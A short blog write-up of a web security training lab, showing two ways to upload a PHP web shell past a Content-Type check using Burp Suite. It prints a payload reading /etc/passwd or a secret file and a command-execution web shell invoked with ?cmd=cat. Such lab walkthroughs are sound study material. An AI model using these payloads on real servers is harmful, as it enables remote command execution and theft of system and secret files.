Lab: Web shell upload via Content-Type restriction bypass

Aditya UniyalAditya Uniyal
2 min read

Solved:

Method 1:

  1. set filter to see image files in burp proxy

  2. upload an image file and retrive the POST request and sent it to repeater.

  3. now from the browser click to go back to “My Account”.

  4. now retrive the GET request and send it to repeater.

  5. now change the filename and the extension to “test.php”, it’ll be under “Content-Disposition”.

  6. remove the file text in red colour.

  7. type this command: <?php echo file_get_contents(‘/etc/passwd‘); ?> - to check whether the payload is working or not. Or simply put the /home/carlos/secret in place of /etc/passwd and send the request in repeater.

  8. switch the tab and change the filename to the exploit file name i.e. “test.php”. Send the request.

  9. it’ll give back a text copy that and go to homepage of website and submit the solution.

Method 2:

  1. Set filter to see image files in burp proxy.

  2. create a shell.php fiile beforehand and type this command in that: <?php system($_GET[‘cmd‘]); ?>

  3. upload it and send the request to repeater.

  4. go back to the myaccount page and open the image in new tab.

  5. In the Url section type: ?cmd=cat+/home/carlos/secret to printout the special code if it gives submit the solution else go back to the repeater in the second request i.e. of shell GET request and type the same command.

0
Subscribe to my newsletter

Read articles from Aditya Uniyal directly inside your inbox. Subscribe to the newsletter, and don't miss out.

file-upload-vulnerabilitesBurpsuite Burp Suite File Upload Attack

Written by

Aditya Uniyal
Aditya Uniyal